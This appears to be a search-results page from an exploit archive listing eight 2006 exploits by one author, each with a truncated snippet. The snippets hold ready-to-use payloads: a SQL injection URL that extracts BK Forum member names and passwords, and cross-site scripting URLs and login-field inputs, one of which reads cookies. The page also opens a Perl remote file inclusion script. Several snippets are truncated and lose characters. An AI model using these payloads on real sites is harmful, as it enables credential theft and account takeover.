8 matches found
Advanced Guestbook 2.4.0 - 'phpBB' Remote File Inclusion
!usr/bin/perl use LWP::UserAgent; Bug Found by Oo Exploit coded by n0m3rcy Copyright c 2006 [email protected] Gr33tz; nukedx , Devil-00 , str0ke , cijfer Usage; n0ag.pl if @ARGV ne 3 else sub header print "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n"; pri...
BK Forum <= 4.0 Remote SQL Injection
BK Forum = 4.0 Remote SQL Injection by n0m3rcy Copyright c 2006 n0m3rcy [email protected] Exploit: First you must be logged in Then type this in your browser http://www.site.com/path/member.asp?id=-120UNION20SELECT201,memName,3,4,5,6,7,8,9,10,11,memPassword,13,14,15,1620FROM20member+where+memID...
BK Forum <= 4.0 (member.asp) Remote SQL Injection Vulnerability
Exploit for unknown platform in category web applications =============================================================== BK Forum = 4.0 member.asp Remote SQL Injection Vulnerability =============================================================== BK Forum = 4.0 Remote SQL Injection by n0m3rcy...
BK Forum <= 4.0 (member.asp) Remote SQL Injection Vulnerability
No description provided by source. BK Forum = 4.0 Remote SQL Injection by n0m3rcy Copyright c 2006 n0m3rcy [email protected] Exploit: First you must be logged in Then type this in your browser...
FileLodge Bolt (showonlineusers.php) Cross-Site Scripting Vulnerbility
FileLodge Bolt showonlineusers.php Cross-Site Scripting Vulnerbility by n0m3rcy Copyright c 2006 n0m3rcy [email protected] Exploit: http://site.com/showonlineusers.php?city=3Cscript3Ealert1;3C/script3E Shoutz: nukedx , cijfer , Devil-00 , str0ke Have phun!...
BK Forum 4.0 - 'member.asp' SQL Injection
BK Forum Exploit: First you must be logged in Then type this in your browser http://www.site.com/path/member.asp?id=-1%20UNION%20SELECT%201,memName,3,4,5,6,7,8,9,10,11,memPassword,13,14,15,16%20FROM%20member+where+memID=1 You will find admin's password Shoutz: nukedx , nukedx , nukedx : , cijfer ...
Shbablek Mail Vulnerablitiy - Cross-Site Scripting
Shbablek Mail Vulnerablitiy - Cross-Site Scripting by n0m3rcy Copyright c 2006 n0m3rcy [email protected] Exploit: i in the Already have an account? ia Account name: scriptalert1/script ib Password: scriptalert1/script Shoutz: cijfer , dag , devil-00 , q-ex and all my friends have phun!...
Encyclopedia <= 3.0 (login.php) CrossSite Scripting - XSS
Encyclopedia = 3.0 login.php CrossSite Scripting - XSS by n0m3rcy Copyright c 2006 n0m3rcy [email protected] Exploit: www.site.com/login.php?action=form&username=username&password=223E3Cscript3Ealertdocument.cookies;3C/script3E Shoutz: cijfer , my baby , Dag & myself :PpP Have phun!...